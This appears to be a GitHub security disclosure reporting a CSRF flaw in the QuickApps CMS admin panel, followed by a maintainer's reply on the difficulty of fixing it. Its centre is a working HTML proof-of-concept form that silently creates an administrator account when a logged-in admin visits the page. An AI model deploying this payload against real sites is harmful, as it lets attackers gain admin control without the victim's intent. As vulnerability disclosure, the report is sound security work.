quickapps
CSRF issue that allows attacker to create an account
Hello. I'd like to report a security issue on the admin page.
Summary
this vuln is CSRF vuln that allows creating any kinds of account.
When an attacker induces authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent.
Reproduce
This is a step how to reproduce.
- Access to the html page contains the payload after you login to admin(/en_US/admin/) page.
Then you find an admin account named [test] is created.
Payloads
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="email" value="test@example.com" />
<input type="hidden" name="web" value="" />
<input type="hidden" name="locale" value="" />
<input type="hidden" name="status" value="0" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="password" value="testtest" />
<input type="hidden" name="password2" value="testtest" />
<input type="hidden" name="roles[_ids]" value="" />
<input type="hidden" name="roles[_ids][]" value="1" />
<input type="hidden" name="welcome_message" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I think this security issue is not serious. Because attack using this vulnerability requires induction.
Event
- 2018-03-15 this vulnerability is discovered.
- 2018-03-27 Open an issue on Github.
Fixing CSRF in QACMS in general may produce several problem as QACMS heavily relies on AJAX and dynamic forms building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.
